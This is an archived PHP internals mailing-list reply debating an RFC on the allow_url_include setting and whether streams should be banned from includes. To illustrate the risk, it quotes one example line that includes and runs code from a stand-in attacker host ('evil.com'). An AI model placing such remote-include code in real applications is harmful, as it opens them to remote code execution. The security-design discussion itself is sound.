Newsgroups: php.internals Path: news.php.net Xref: news.php.net php.internals:83934 Return-Path: Mailing-List: contact internals-help@lists.php.net; run by ezmlm Delivered-To: mailing list internals@lists.php.net Received: (qmail 4906 invoked from network); 26 Feb 2015 22:52:34 -0000 Received: from unknown (HELO lists.php.net) (127.0.0.1) by localhost with SMTP; 26 Feb 2015 22:52:34 -0000 Authentication-Results: pb1.pair.com header.from=smalyshev@gmail.com; sender-id=pass Authentication-Results: pb1.pair.com smtp.mail=smalyshev@gmail.com; spf=pass; sender-id=pass Received-SPF: pass (pb1.pair.com: domain gmail.com designates 209.85.192.179 as permitted sender) X-PHP-List-Original-Sender: smalyshev@gmail.com X-Host-Fingerprint: 209.85.192.179 mail-pd0-f179.google.com Received: from [209.85.192.179] ([209.85.192.179:44764] helo=mail-pd0-f179.google.com) by pb1.pair.com (ecelerity 2.1.1.9-wez r(12769M)) with ESMTP id 18/D3-32582-1B3AFE45 for ; Thu, 26 Feb 2015 17:52:34 -0500 Received: by pdbnh10 with SMTP id nh10so16262943pdb.11 for ; Thu, 26 Feb 2015 14:52:31 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=message-id:date:from:user-agent:mime-version:to:cc:subject :references:in-reply-to:content-type:content-transfer-encoding; bh=VHW3KSF3pR5nJVG9T9R7BCR4/lwU1LUA5nrYin4MKz0=; b=UglskO52mWl2IOqSbuTJI0yRbsS4+inZJro2swGHdSvqsXmIbahCvJDG+y4sYQq8Vi SBr96oma4x6qkDU4ZVZdhUt/1adC8W5fh/uw5vXBdgYTdZZN5/QUAepKkfJLE4PRc78M Z+A9mPAeZa8Ew+5RW7UYW1XVqd3oIQGqbE+ViOlS1zkgOusoSpNwjy+jhilFhqOo7Jip P4SLa2PNt7jTt5y6nSFOCer0l9AVwjzyXTRO919TmooUiwuSIn0Ew09kADg03uBqHd9L lqaEOX2nMThrihAyGN0vZtue+cFJT/Nvxr3XPC+Wob8nhgS/NTIO4zXRbGNpFuXNHHei 9uXQ== X-Received: by 10.70.43.38 with SMTP id t6mr17508467pdl.97.1424991150890; Thu, 26 Feb 2015 14:52:30 -0800 (PST) Received: from Stas-Air.local (108-66-6-48.lightspeed.sntcca.sbcglobal.net. [108.66.6.48]) by mx.google.com with ESMTPSA id g2sm2001534pbw.37.2015.02.26.14.52.29 (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Thu, 26 Feb 2015 14:52:29 -0800 (PST) Message-ID: <54EFA3AC.9070406@gmail.com> Date: Thu, 26 Feb 2015 14:52:28 -0800 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Thunderbird/31.4.0 MIME-Version: 1.0 To: Yasuo Ohgaki CC: "internals@lists.php.net" References: <54EE50CF.9090508@gmail.com> <54EE5A39.9040401@gmail.com> <54EEDE8E.6070201@gmail.com> In-Reply-To: Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit Subject: Re: [PHP-DEV] Re: [RFC][VOTE] Introduce script only include/require From: smalyshev@gmail.com (Stanislav Malyshev) Hi! > SInce allow_url_include change is very simple one, I've just made new RFC > for it. > > https://wiki.php.net/rfc/allow_url_include > > If you find any other issue like this that relates to this RFC, please > let me know > I'll put this discussion shortly. I'm not sure what this RFC is trying to achieve. I.e. why make it INI_ALL? Setting it to off instantly allows remote includes, etc. so if you are at all worried about vulnerable includes, you'd never tell anybody to enable it (there can be rare cases where you want to enable it, but really if you know what you're doing - that's why the level is so high, supposedly if you have access to SYSTEM, you run the server so you're supposed to know some stuff about security or at least it's your own server you're ruining if you don't). As for the second part - banning all streams from allow_url_include - that would be pretty huge BC break, as streams are used in many scenarios where you may need virtual FSs, filters, etc. It is a very handy tool. Current setting allows you to operate inside your local security domain while cutting off content that comes from outside of your domain. Your proposal would give the user the choice of either to disable streams completely and lose all benefits coming with them - or allow everything completely, including require "http://evil.com/inject.php". That's not a good choice to give to the users. -- Stas Malyshev smalyshev@gmail.com